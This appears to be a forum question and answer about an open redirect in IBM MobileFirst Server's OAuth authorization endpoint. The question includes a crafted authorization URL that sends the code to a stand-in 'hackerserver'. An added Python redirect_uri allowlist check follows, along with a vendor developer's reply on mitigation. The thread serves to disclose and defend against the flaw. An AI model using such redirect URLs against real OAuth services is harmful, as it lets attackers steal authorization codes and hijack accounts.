I log in to the application via a security check (UserAuthSecurityCheck).
I frame a URL for the authorization endpoint and change the redirect_uri to a different server (hacker server):
http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=UserAuthSecurityCheck&redirect_uri=http://hackerserver:port/context/getdata
When I make this request, it delivers the authorization code to the hacker server: http://hackerserver:port/context/getdata?code=authorization_code
Now I am able to access this authorization_code on the hacker server.
I believe a hacker can take advantage of this: he makes you click a link in a different browser tab and is able to execute the request to the authorization endpoint.
Why is no whitelisting done in the framework for "redirect_uri"?
How can this issue be mitigated?
Open redirects must be avoided as per the OAuth specification:
https://www.rfc-editor.org/rfc/rfc6749#section-10.15
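A redirect_uri allowlist check of the kind the question asks about, written as an added illustration of RFC 6749 section 10.15; it is not code from the question or from MobileFirst Server, and the client registry, hostnames and ports in it are constructed.

```python
"""Exact-match redirect_uri validation for an OAuth 2.0 authorization
endpoint (added illustration, not MobileFirst Server code).
The registry and the URLs below are constructed sample values."""
from urllib.parse import urlsplit, parse_qs

# Constructed registry: client_id -> redirect URIs registered at enrolment.
REGISTERED_REDIRECT_URIS = {
    "CLIENT_ID": {"http://legitapp.example:8080/context/getdata"},
}

def normalize(uri: str) -> str:
    """Canonical form for comparison: lowercase scheme and host, explicit
    port, path kept verbatim; a query or fragment is rejected outright."""
    parts = urlsplit(uri)
    if parts.query or parts.fragment:
        raise ValueError("redirect_uri must not carry a query or fragment")
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("redirect_uri must be an absolute http(s) URI")
    # parts.port raises ValueError for a non-numeric port such as ":port".
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return f"{parts.scheme}://{parts.hostname}:{port}{parts.path}"

def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """True only if redirect_uri exactly matches a URI registered for client_id."""
    try:
        candidate = normalize(redirect_uri)
    except ValueError:
        return False
    registered = {normalize(u) for u in REGISTERED_REDIRECT_URIS.get(client_id, ())}
    return candidate in registered

def authorize(request_url: str) -> dict:
    """Handle the /authorization request. On an unregistered redirect_uri the
    server must not redirect at all; it answers the user agent with an error."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(request_url).query).items()}
    client_id = params.get("client_id", "")
    redirect_uri = params.get("redirect_uri", "")
    if not redirect_uri_allowed(client_id, redirect_uri):
        return {"status": 400, "error": "invalid_request",
                "detail": "redirect_uri not registered for client"}
    # Only a registered URI ever receives the code (placeholder value here).
    return {"status": 302, "location": f"{redirect_uri}?code=<authorization_code>"}
```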
You are right that we are not whitelisting the redirect_uri; however, the MobileFirst Server is mitigating this vulnerability by forcing the token request (that uses the authorization code) to be signed, thus making the attack invalid.

Disclaimer: I'm a developer in the IBM MobileFirst Foundation team.